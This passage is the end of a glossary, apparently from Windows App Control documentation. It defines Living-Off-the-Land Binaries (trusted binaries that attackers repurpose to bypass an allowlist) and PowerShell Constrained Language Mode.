  { term: "LOLBin", definition: "Living-Off-the-Land Binary. A trusted binary, often vendor-signed, repurposed by attackers to bypass an allowlist (e.g. mshta.exe evaluating an HTA blob)." },
  { term: "Constrained Language Mode", definition: "Reduced PowerShell language mode App Control forces with UMCI on. Blocks reflection, dynamic-type creation, and arbitrary .NET API calls; restricts evaluation surface." }
]} />
